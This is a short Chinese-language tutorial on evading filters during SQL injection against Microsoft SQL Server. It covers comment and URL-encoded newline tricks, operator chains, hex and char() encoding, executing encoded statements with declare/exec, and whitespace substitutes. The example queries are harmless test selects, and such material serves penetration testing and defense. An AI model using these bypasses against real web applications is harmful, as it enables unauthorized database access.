SQL Server从0到1——绕过

垃圾数据

注释：

单行注释：利用单行注释将多行注释注释掉然后利用换行符换行 
多行注释： /*xxxx*/，xxxx可以是符合数字和字符（这非常关键），但没有mysql中的/*!xx*/这种用法

单行：

select --/*
'naihe567'
--*/

 

但在web传参时需要进行url编码：

select --/*%0a'naihe567'%0a--*/

多行：

这里是mssql的

下面是mysql的

运算符：运算符一般是配合报错注入使用

select * from test.dbo.users where ++++-+-~~1=(select user)
#原理是使用特殊运算只会改变值并不会改变数据类型，-+^*|&都可以使用

 

编码

编码主要是利用十六进制和ascii码 users表内容如下：

十六进制：

select * from test.dbo.users where username=0x44756d6d79
Dummy的十六进制为0x44756d6d79

 

ascii码：

select * from test.dbo.users where username =  char(100)+char(117)+char(109)+char(109)+CHAR(121)
#使用char函数

 

回调

使用declear与exec函数 declear会创建一个局部变量，在使用exec执行变量中的内容

declare @s varchar(2000) set @s=0x73656c656374206e61696865353637  exec(@s)
#declear与exec其实是属于报错注入范畴，但是它可以将一个完成的sql语句进行编码执行
#0x73656c656374206e61696865353637 解码后就是 select naihe567

 

declare @s varchar(2000) set  @s=CHAR(115)+CHAR(101)+CHAR(108)+CHAR(101)+CHAR(99)+CHAR(116)+CHAR(32)+...+CHAR(39) exec(@s)
#ascii也可以

替换

利用其他空白符替换空格：

%20 %09 %0a %0b %0c %0d

利用[],()替换空格：

select(username)from[test].[dbo].[users]